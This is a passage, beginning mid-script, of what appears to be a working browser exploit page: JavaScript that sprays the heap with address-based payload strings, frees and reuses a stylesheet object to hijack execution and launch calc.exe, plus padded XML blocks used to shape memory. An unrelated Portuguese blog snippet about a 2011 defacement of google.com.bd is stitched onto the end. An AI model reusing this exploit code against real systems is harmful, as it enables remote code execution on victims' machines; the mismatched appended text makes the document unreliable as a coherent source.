u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");
 //"%u6163%u636C%u652D%u6578%u0000
 //%u3A63%u775C%u6E69%u6F64%u7377%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578
 //c:\windows\system32\calc.exe
 //%63%61%6C%63%2E%65%78%65
 //%63%3A%5C%77%69%6E%64%6F%77%73%5C%73%79%73%74%65%6D%33%32%5C%63%61%6C%63%2E%65%78%65

 //var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123%u0124%u0125%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F%u0170%u0171%u0172%u0173%u0174%u0175%u0176%u0177%u0178%u0179%u017A%u017B%u017C%u017D%u017E%u017F%u0180%u0181%u0182%u0183%u0184%u0185%u0186%u0187%u0188%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF%u01C0%u01C1%u01C2%u01C3%u01C4%u01C5%u01C6%u01C7%u01C8%u01C9%u01CA%u01CB%u01CC%u01CD%u01CE%u01CF%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF");

 while(heapspray.length < 0x200) heapspray += unescape("%u4444");

 var heapblock = heapspray;
 while(heapblock.length < 0x40000) heapblock += heapblock;
 finalspray = heapblock.substring(2, 0x40000 - 0x21);

 //alert('Base address of ado15.dll ' + adobase.toString(16));
 if(CurrentHeapSpraySize < 900) {
 window.setTimeout(SprayHeap, 100);
 }
 else {
 RunExploit();
 }
}

function SprayHeap() {
 if(CurrentHeapSpraySize < FinalHeapSpraySize - 1) {
 for(var i = 0; i < 90; i++) {
 heap.alloc(finalspray);
 CurrentHeapSpraySize++;
 }
 var percentcomplete = Math.round(CurrentHeapSpraySize /FinalHeapSpraySize * 100);
 document.getElementById('progressfasetwo').innerText = percentcomplete + "%";
 window.setTimeout(SprayHeap, 100);
 }
 else {
 document.getElementById('textfasetwodone').innerText = "Ready to start calc.exe in: ";
 window.setTimeout(RunExploitTimer, 100);
 }

}

function RunExploitTimer() {
 if(ExpoitTime > 0) {
 document.getElementById('countexploitrun').innerText = ExpoitTime;
 window.setTimeout(RunExploitTimer, 500);
 ExpoitTime--;
 }
 else {
 document.getElementById('countexploitrun').innerText = 0;
 var EndTime = new Date();
 var TotalRun = Math.round((EndTime.getTime() - StartTime.getTime()) / 1000);
 document.getElementById('totalruntime').innerText = "Total exploitation time: " + TotalRun + " seconds";
 window.setTimeout(RunExploit, 100);
 }
}

function RunExploit() {

 var elms = new Array();
 for(i =0; i < 100; i++) {
 elms.push(document.createElement('div'));
 }

 owningObj = document.styleSheets[0].owningElement;

 myimports = document.styleSheets[0].imports;

 document.appendChild(owningObj);
 document.removeChild(owningObj);

 owningObj.outerHTML = 'a';

 Math.atan2(0xbabe, "Collect");
 CollectGarbage();

 Math.atan2(0xbabe, "spray");
 for(i = 0; i < 100; i++) {
 elms[i].className = unescape("%u4140%u4141%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u2020%u1604%u2020%u1604%u4159%u415a%u415b");
 }

 Result = owningObj.insertAdjacentElement(myimports,'a');


}

function MakeAddressString(addrint) {
 //First, turn into hex:
 var addstr = addrint.toString(16);
 //Split and swap
 addstr = addstr.replace(/(\w\w\w\w)(\w\w\w\w)/,"%u$2%u$1");
 return addstr;
}

 </script>

 </head>
 <body onLoad="window.setTimeout(Start,100);" id="bodyid">
 <div>
 <h2 id="textfaseone"></h2>
 <br>
 <h2 id="progressfaseone"></h2>
 <br>
 <h2 id="textfaseonedone"></h2>
 <br>
 <h2 id="textfoundaddress"></h2>
 <br>
 <h2 id="textfasetwo"></h2>
 <br>
 <h2 id="progressfasetwo"></h2>
 <br>
 <h2 id="textfasetwodone"></h2>
 <br>
 <h2 id="countexploitrun"></h2>
 <br>
 <h2 id="totalruntime"></h2>
 </div>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid1">
<Devices>
<Device>
<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid2">
<Devices>
<Device>
<BBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid3">
<root>
<data>
 <SmallData>
 </SmallData>
<MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
 value1
</MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong>
</data>
</root>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid4">
<Devices>
<Device>
<bb />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid5">
<Devices>
<Device>
<BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid6">
<root>
<data>
<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
 value2
</CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
</data>
</root>
</XML>

 </body>
</html>

Google Hacked

Publicado em

Hoje pela manhã (08/01/11) a index da www.google.com.bd foi desfigurada. Há rumores que foi mais um envenenamento de cache DNS mas vai saber…

by: TiGER-M@TE

Vejo no “nosso” bom e velho cache: http://www.zone-h.org/mirror/id/12874645